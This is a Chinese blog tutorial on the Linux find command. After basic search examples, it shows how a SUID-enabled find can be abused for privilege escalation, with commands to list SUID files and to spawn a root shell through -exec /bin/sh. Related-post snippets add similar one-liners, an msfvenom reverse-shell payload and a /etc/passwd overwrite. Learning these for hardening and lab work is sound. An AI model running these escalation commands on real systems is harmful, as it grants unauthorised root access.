find基础命令与提权教程

最新推荐文章于 2024-11-25 11:22:56 发布
原创 最新推荐文章于 2024-11-25 11:22:56 发布 · 1.3w 阅读 · 52 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#linux #安全 #其他

本文详细介绍了find命令的基础用法及高级参数,包括按文件名、权限、大小、类型和时间等条件查找文件,并提供了实用的示例。此外,还讲解了如何利用find命令进行提权操作。

find基础命令与提权教程

find命令用来在指定目录下查找文件,若不指定目录则视为当前目录

  1. find常用参数

语法:find [path…] [expression]

path为查找路径,.为当前路径,/为根目录

expression即为参数

-name: 按文件名查找文件

-perm: 按照文件权限来查找文件,4000,2000,1000为分别表示SUID,SGID,SBIT,如777为普通文件的最高权限,7000为特殊文件的最高权限

-user: 按照文件属主来查找

-size n: 文件大小是n个单位

-type:

  1. d:目录
  2. f:文件
  3. c:字符设备文件
  4. b:块设备文件

-atime n: time表示日期,时间单位是day,查找系统最后n*24小时内曾被存取过的文件或目录

-amin n: 查找系统最后n分钟内曾被存取过的文件或目录

-ctime n: 查找系统中最后n*24小时内曾被改变文件状态(权限、所属组、位置…)的文件或目录

-cmin n: 查找系统中最后N分钟内曾被改变文件状态(权限、所属组、位置…)的文件或目录

-mtime: 查找系统中最后N分钟内曾被更改过的文件或目录

-mmin n: 查找系统中最后n*24小时内曾被更改过的文件或目录

-print: 将匹配的文件输出到标准输出

-exec: find命令对匹配的文件执行该参数所给出的shell命令。相应命令的形式为’command’ { } ;,注意{ }和\;之间的空格。

  1. find实例

1.在当前目录下查找文件名以txt为后缀的文件

find -name '*.txt'

在这里插入图片描述

2.在root目录下查找大于50m小于100m的文件

find / -size +50M -size -100M -type f

image-20200429172745324

3.查找在10分钟内读取过的文件

find / -amin 10 -type f

image-20200429174922521

4.查找权限为777的文件或目录并排序

find -perm -777 -type f |sort

image-20200429175224845

5.查找当前目录下所有.txt文件并把他们拼接起来写入到all.txt文件中

find . -type f -name "*.txt" -exec cat {} \;> all.txt

image-20200429175546430

6.因为单行命令中-exec参数中无法使用多个命令,以下方法可以实现在-exec之后接受多条命令

find '1.txt' -exec ./text.sh {} \;

text.sh内容

image-20200429180229545
命令结果
image-20200429180247895

  1. find命令提权

1.使用find命令查看拥有suid权限的文件

find / -perm -u=s -type f 2>/dev/null

image-20200429180608916
2.使用exec查看当前用户

find text -exec "whoami" \;

text必须是可以找到的文件名,不然会出错,可以看到是root权限,如果这里显示的不是可以接着看下一步

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Dhsnk9w4-1588155429520)(upload%5Cimage-20200429181002364.png)]

3.使用find命令来提权

find text.sh -exec "/bin/sh" \;

image-20200429181135512

find命令常用命令
墨痕诉清风的博客
06-07 2226
查看具有suid 限的可执行二进制程序 查找root限可写文件 其它用户也可以写 查找root限可写、可执行文件 其它用户也可以写、执行 查找当前用户可读文件 findfind命令suid在输出结果中,执行如下代码,...
[升] Linux & 维持 — 系统错误配置 - 计划任务
最新发布
Blue17 の 小窝
02-07 1208
靶机 CentOS7:IP 192.168.0.137攻击机 Kali Linux:IP 192.168.0.136。
find基础命令教程find过程分析
xt350488的博客
08-21 1844
在信息安全的广阔领域中,系统命令限设置至关重要。find命令作为Linux常用的文件查找工具,在日常管理中广泛应用。然而,当find命令被错误地赋予SUID限时,它可能成为攻击者执行特操作、实现升的工具。本文深入探讨find命令的常规用法,展示其在特定限设置下的安全风险,并通过实际案例演示升过程,供针对性的防御策略。find常用参数语法:find 【path...】 【expression】​。
find命令以及反弹shell复现
qq_40898302的博客
04-21 1万+
关于linux系统的find命令复现
Linux常用方法 (゚益゚メ) 渗透测试
寻觅的博客
03-30 3873
文章目录简介常用命令汇总Linux环境变量简述 简介 进行linux前最好对Linux信息收集、渗透测试常用命令有所了解。 常用命令汇总 这里简单在一下常用命令 命令 作用 uname -a 查看系统所有信息 ifconfig -a 查看所有网络信息 ps aux或ps -elf 查看进程信息 id 或 who 或 w 或 last 查看用户信息 crontab -l 查看当前用户的计划任务 Linux环境变量简述 ...
LinuxFind命令也能方式一文通透
weixin_51725318的博客
11-25 2183
LinuxFind命令也能方式一文通透
DC-1 (FIND)
E1even的博客
08-24 948
文章目录扫描存活主机及其开放端口FLAG1获取:利用MSF拿下入口FLAG2:配置文件泄露信息FLAG3:EXP添加管理员账户FLAG4、5:linuxFIND DC涉及到linux,前面的信息搜集阶段的操作也是很不错的实践方法,接下来几天将会持续更新完毕DC系列 靶机:192.168.78.133 kali:192.168.78.131 配置: kali和靶机都配置成net模式 扫描存活主机及其开放端口 首先查看一下kali网卡的ip段: ifconfig kali和靶机在同一网卡里面,
DOS命令基础实战应用教程合集
标题《dos命令--龙域网安入侵系列教程》和描述《龙域网安入侵系列教程》所涉及的知识...通过本系列教程的学习,用户可以逐步构建起从基础命令到高级应用的完整知识体系,为今后在网络安全领域的深入研究打下坚实基础
】metasploit方法
孤桜懶契
08-22 973
前言 metasploit 使用 常用的模块 metasploit EXP存储文件夹路径 find / -name metasploit 一般都在 /usr/share/metasploit-framework/modules/exploits/windows/local windows2003 环境:2003 server 1、生成攻击载荷 msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.108 lpo
Linux从入门到精通:基础命令系统管理详解
同时,“用户限管理”涉及用户添加(`useradd`)、密码设置(`passwd`)、组管理(`groupadd`)、sudo机制等内容,确保系统多用户环境下的安全性。 “软件仓库的使用”体现了现代Linux包管理的优势。YUM...
[网络安全自学篇] 六十五.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑示例(一)
热门推荐
杨秀璋的专栏
04-10 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来博友们学习,希望您们喜欢,一起进步。前文分享了SMBv3服务远程代码执行漏洞(CVE-2020-0796),攻击者可能利用此漏洞远程无需用户验证,执行恶意代码并获取机器的完全控制。本文将详细讲解Vulnhub靶机渗透的环境搭建和JIS-CTF题目,采用Nmap、Dirb、中国蚁剑、敏感文件分析、SSH远程连接、Shell等获取5个flag。由于hack the box速度堪忧,作者选择了Vulnhub靶场,希望深入分析来
小记SUID -find
nini_boom的博客
11-01 2328
find / -user root -perm -4000 -print 2>/dev/null find / -perm -u=s -type f 2>/dev/null find / -user root -perm -4000 -exec ls -ldb {} ; 如果有find执行 touch test find . -exec /bin/sh ; -quit 这时候,你就拥有...
linux 总结
weixin_51681694的博客
06-13 8685
会继续补充.....
查找文件之find
weixin_33979363的博客
03-10 177
文件查找locate;1、非实时,模糊匹配,查找是根据全系统文件数据库进行的;2、#updatedb,手动生成文件数据库3、优势:速度快find;1、实时查找2、精确3、支持众多查找标准4、遍历指定目录中的所有文件完全查找,速度慢;find...
利用find
weixin_43239236的博客
01-23 1245
1.如果find限 先测试 find / -type f -name getflag -exec “whoami” ; find / -type f -name getflag -exec “/bin/sh” ;
小记 SUID find
crispr的博客
01-29 6299
find 姿势一 find / -perm -g=s -type f 2>/dev/null find . -exec /bin/sh -p \; -quit 姿势二 touch getshell find / -type f -name getshell -exec "whoami" \; find / -type f -name getshell -exec "/bin/sh" \...
Dc-1靶机简单拿shell find
weixin_52263461的博客
12-09 408
Dc-1 msf 方法 nmap -sn192.168.0.1/24 扫描C段下局域网IP (Oracle VirtualBox virtual NIC) 代表的是靶机IP nmap -A 192.168.0.160 扫描靶机IP详细信息 可以发现drupal漏洞 3 使用msfconsole 工具 4 使用第四个模块 把yes的三个选项改掉 set RHOSTS 目标IP set TARGETURI drupal show options
Linux:SUID
Elite的博客
03-05 3165
find命令为例,讲解SUID原理
SUIDfind配置不当)
ljj20020718的博客
07-19 439
备份passwd文件,使用openssl passwd生成一个密码,再使用python搭建一个http服务,然后使用本地物理机下载passwd备份文件。在本地使用python开启http服务并将passwd备份文件放到该目录下,使用wget -0下载该备份文件并覆盖原有的passwd文件。suid限解释:当文件被设置了suid限后表示该文件被执行时会将当前的用户限暂时切换为文件所有者的限(所有者一般为root)发现find命令,使用find的-exec参数将wget命令也增加suid限。
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值